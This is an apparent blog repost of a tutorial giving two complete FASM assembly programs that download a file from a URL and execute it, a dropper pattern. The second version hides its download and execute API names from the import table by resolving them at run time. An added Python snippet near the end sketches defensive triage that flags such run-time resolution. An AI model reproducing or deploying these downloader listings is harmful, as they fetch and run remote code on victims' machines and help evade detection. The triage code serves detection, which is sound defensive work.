
ASM – Downloader

I found this nice piece of code on this website: http://wiremask.eu. Why is ASM so good? Well, first of all, it compiles into the smallest binaries you have ever seen.

“A new development tutorial has been added. It explains how to code a file downloader + executor in assembly language using the FASM compiler.

Link to full tutorial: http://wiremask.eu/page.php?id=2

The first code is the most simple and clear file downloader, it shows how to use the Windows API, the compiled file size is 2KB.”

downexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Simple Version
; Download and Execute a File
; 2012 By Wiremask.eu
 
; choose Entry point
entry start
include 'include\win32a.inc'
; Declare Constants
section '.data' data readable writeable
_file        db 'file.htm',0
_url        db 'http://wiremask.eu/',0
 
section '.code' code readable executable
; Entry point
start:
; Call download of _url
invoke URLDownloadToFile, 0, _url, _file, 0, 0
; Call execution of _file
invoke ShellExecute, 0, 0, _file, 0, 0, SW_SHOW
; Exit Application
invoke ExitProcess, 0
 
; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll',\
urlmon,'urlmon.dll',\
shell32,'shell32.dll'
import kernel32,\
ExitProcess,'ExitProcess'
import urlmon,\
URLDownloadToFile,'URLDownloadToFileA'
import shell32,\
ShellExecute,'ShellExecuteA'

This next code is a bit more complicated: it loads the APIs dynamically at runtime using GetProcAddress and LoadLibrary.

dyndownexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Advanced Version ( Dynamic )
; Download and Execute a File
; 2012 By Wiremask.eu
 
; choose Entry point
entry start
include 'include\win32a.inc'
; Declare Constants
section '.data' data readable writeable
_urlmon                db 'urlmon.dll',0
_shell                db 'shell32.dll',0
_URLDownloadToFile    db 'URLDownloadToFileA',0
_ShellExecute        db 'ShellExecuteA',0;
 
_url    db 'http://wiremask.eu/',0
_file    db 'file.htm',0
 
section '.code' code readable executable
start:
; Load urlmon.dll
invoke LoadLibrary, _urlmon
cmp eax, 0
je exit
; Keep the module handle; ebx is preserved across API calls
mov ebx, eax
; Get address of URLDownloadToFileA function
invoke GetProcAddress, ebx, _URLDownloadToFile
cmp eax, 0
je exit
; Set parameters of URLDownloadToFileA
push 0
push 0
push _file
push _url
push 0
; Call URLDownloadToFileA
call eax
; Free urlmon.dll using the saved module handle
invoke FreeLibrary, ebx

; Load shell32.dll
invoke LoadLibrary, _shell
cmp eax, 0
je exit
; Keep the module handle; ebx is preserved across API calls
mov ebx, eax
; Get address of ShellExecute function
invoke GetProcAddress, ebx, _ShellExecute
cmp eax, 0
je exit
; Set parameters of ShellExecute
push SW_SHOW
push 0
push 0
push _file
push 0
push 0
; Call ShellExecute
call eax
; Free shell32.dll using the saved module handle
invoke FreeLibrary, ebx
 
exit:
; Exit Application
invoke ExitProcess, 0
 
; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll'
 
import kernel32, ExitProcess, 'ExitProcess',\
LoadLibrary,'LoadLibraryA',\
GetProcAddress, 'GetProcAddress',\
FreeLibrary, 'FreeLibrary'
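
For triage, the practical difference between the two listings is where the API names end up: the first exposes URLDownloadToFileA and ShellExecuteA in its import table, while the second imports only kernel32 functions and keeps those names as data strings. The Python check below is an added example, not code from the original page or from Wiremask; the sample byte strings are constructed from the listings' string constants, and the `imported` set is assumed to come from a separate PE parser.

```python
import re

# API names taken from the two listings on this page.
DOWNLOAD_APIS = {"URLDownloadToFileA"}
EXECUTE_APIS = {"ShellExecuteA"}
RESOLVERS = {"LoadLibraryA", "GetProcAddress"}
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def names_in(data, names):
    """API names that occur in the file as NUL-terminated ASCII strings."""
    return {n for n in names if n.encode("ascii") + b"\x00" in data}


def triage(data, imported):
    """Classify a PE image by where its download/execute API names live.

    imported: function names from the import table, taken from whatever
    PE parser the analyst already uses (assumption, not parsed here).
    """
    imported = set(imported)
    download = names_in(data, DOWNLOAD_APIS)
    execute = names_in(data, EXECUTE_APIS)
    # Present as a string but missing from the import table: a candidate
    # for a GetProcAddress lookup at run time.
    hidden = (download | execute) - imported
    if not (download and execute):
        verdict = "no download+execute pair"
    elif hidden:
        verdict = "download+execute, resolved at run time"
    else:
        verdict = "download+execute, static imports"
    urls = sorted(u.decode("ascii") for u in URL_RE.findall(data))
    return {"verdict": verdict, "runtime_resolved": sorted(hidden),
            "resolvers_imported": RESOLVERS <= imported, "urls": urls}


# Constructed samples: only the strings each listing leaves in its file.
STATIC_SAMPLE = (b"file.htm\x00http://wiremask.eu/\x00"
                 b"\x00\x00ExitProcess\x00\x00\x00URLDownloadToFileA\x00"
                 b"\x00\x00ShellExecuteA\x00")
STATIC_IMPORTS = {"ExitProcess", "URLDownloadToFileA", "ShellExecuteA"}
DYNAMIC_SAMPLE = (b"urlmon.dll\x00shell32.dll\x00URLDownloadToFileA\x00"
                  b"ShellExecuteA\x00http://wiremask.eu/\x00file.htm\x00")
DYNAMIC_IMPORTS = {"ExitProcess", "LoadLibraryA", "GetProcAddress", "FreeLibrary"}

if __name__ == "__main__":
    print(triage(STATIC_SAMPLE, STATIC_IMPORTS))
    print(triage(DYNAMIC_SAMPLE, DYNAMIC_IMPORTS))
```

An import-table-only rule matches the first listing but not the second, which is why the string comparison against the import set is the part worth keeping.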

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you are interested in joining the ZeroSecurity team please use the contact forum located above to contact us.